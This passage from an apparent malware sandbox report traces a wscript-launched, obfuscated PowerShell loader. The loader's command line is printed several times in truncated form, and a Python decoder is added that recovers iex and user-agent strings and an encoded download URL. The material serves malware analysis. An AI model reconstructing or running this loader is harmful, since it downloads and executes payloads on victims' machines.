            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
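The `Reeling` function in the command line above is the only decoding step the loader uses: `$reinvigorate` becomes 1 when `$host.CurrentCulture` is non-null (in a host that reports no culture the substring width stays 0 and every literal decodes to an empty string), and each `Reeling '...'` literal is then read one character at a time from offset 2 in steps of 3, stopping before the last character. The decoder below is an added example for this page, not Joe Sandbox output and not part of the sample; it assumes `$reinvigorate` equals 1. It is checked against the short literals that survived the rendering of this report intact (`$Triatomicity`, `$Alytes`, `$Aabningstid`) and against the `$Friluftsmenneskerne` literal, which spans the line break in the entry and must decode to the cmd.exe command line listed under Operating System Protection Evasion further down. Runs of spaces inside the longer literals (the URL in `$Undgldes`, the user agent in `$lignings`) appear to have been collapsed by the HTML, since they no longer decode on the 3-character grid; decode those from the raw command line in the process tree, not from the text of this listing. The same command line recurs in the later powershell.exe and wscript.exe entries of this section.

```python
"""
Decoder for the character-picking obfuscation used by the PowerShell stage in
this report.  Added example for this page; not Joe Sandbox output and not code
from the sample.  The script in the report defines (names as in the sample):

  If (${host}.CurrentCulture) {$reinvigorate++;}          # 1 on a normal host
  Function Reeling($Takkende){
      $Mjavende=$Takkende.Length-$reinvigorate;
      For($kngtende=2; $kngtende -lt $Mjavende; $kngtende+=3){
          $out += $Takkende.SUBsTRIng.Invoke($kngtende, $reinvigorate); }
      $out }

i.e. take one character at offsets 2, 5, 8, ... while offset < length - 1.
"""
import re

REINVIGORATE = 1  # assumption: $host.CurrentCulture was non-null, so $reinvigorate++ made it 1


def reeling(blob: str, width: int = REINVIGORATE, offset: int = 2, step: int = 3) -> str:
    """Python port of the sample's Reeling(): blob[i:i+width] for i = 2, 5, 8, ... < len - width."""
    limit = len(blob) - width
    return "".join(blob[i:i + width] for i in range(offset, limit, step))


# Matches  Reeling '<literal>'  (PowerShell single-quoted string; '' inside is an escaped quote).
LITERAL = re.compile(r"Reeling\s+'((?:[^']|'')*)'", re.IGNORECASE)


def decode_literals(cmdline: str) -> list[tuple[str, str]]:
    """Return (encoded, decoded) for every Reeling '...' literal in a command line, in order."""
    return [(m.group(1), reeling(m.group(1).replace("''", "'"))) for m in LITERAL.finditer(cmdline)]


# Excerpt copied from the powershell.exe command line in the report.  Only the short literals
# are used: the HTML rendering collapsed runs of spaces in the longer ones, which breaks the grid.
EXCERPT = (
    "$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';"
    "$Alytes=Reeling ' G>P. ';"
    "$Aabningstid=Reeling ',riS.e axEs ';"
)

# The $Friluftsmenneskerne literal spans a line break in the report entry; the break is part of
# the string and is assumed to be a single LF (a CRLF would shift the grid by one).
FRILUFTSMENNESKERNE = (
    " uenycI.h,ro . \n"
    "P%Una MpGop.nd.oa,rtOmaD.%Za\\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs "
)


def decode_report_excerpt() -> dict[str, str]:
    """Decode the excerpt plus the cmd.exe payload string, keyed by the PowerShell variable name."""
    names = re.findall(r"\$(\w+)=Reeling", EXCERPT)
    decoded = dict(zip(names, (plain for _, plain in decode_literals(EXCERPT))))
    decoded["Friluftsmenneskerne"] = reeling(FRILUFTSMENNESKERNE)
    return decoded


if __name__ == "__main__":
    for name, value in decode_report_excerpt().items():
        print(f"{name:22s} -> {value!r}")
```

Run against an exported command line, `decode_literals()` yields every literal in script order, so with the variable names in front the plaintext script can be reassembled: `$Aabningstid` is `iex`, which makes `Convictively` a wrapper around `. iex`, and `$Triatomicity` is the `User-Agent` header name the downloader sets. `$Friluftsmenneskerne` decodes to `echo %appdata%\Noncongestion.For && echo t`, exactly the cmd.exe command line the report records, which is how the script resolves `%appdata%` without touching `$env:`.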
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 9_2_00007FFB4AF45479 push ebp; iretd 9_2_00007FFB4AF45538
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 13_2_0500EC78 pushfd ; retf 13_2_0500EC79
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Code function: 13_2_07E7CB18 pushfd ; retf 13_2_07E7CD26
            Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX (2 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (76 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX (87 occurrences)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe  Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5197
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4729
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 5813
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Window / User API: threadDelayed 4031
            Source: C:\Windows\System32\wscript.exe TID: 7668  Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396  Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4200  Thread sleep count: 5813 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4452  Thread sleep count: 4031 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2112  Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477
            Source: wscript.exe, 00000000.00000003.1392277797.0000023822D68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396822089.0000023822D65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392096367.0000023822D41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW~*
            Source: powershell.exe, 00000009.00000002.2715037329.00000247FBF02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match  File source: amsi64_1296.amsi.csv, type: OTHER
            Source: Yara match  File source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTR
            Source: Yara match  File source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . 
P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility aflytningsudstyrene sortkridtstegningerne myoparalysis rivinian undgldes chowtime anodynia betoningerne blyantstegninger frydefuld whacker prvekrt kendemrket fjernsynets oligocarpous hawkshaws underlegenhedsflelserne sortspttes boleroers opklares kamsin archin intetanendes exhaustibility';if (${host}.currentculture) {$reinvigorate++;}function reeling($takkende){$mjavende=$takkende.length-$reinvigorate;$neocortical='substri';$neocortical+='ng';for( $kngtende=2;$kngtende -lt 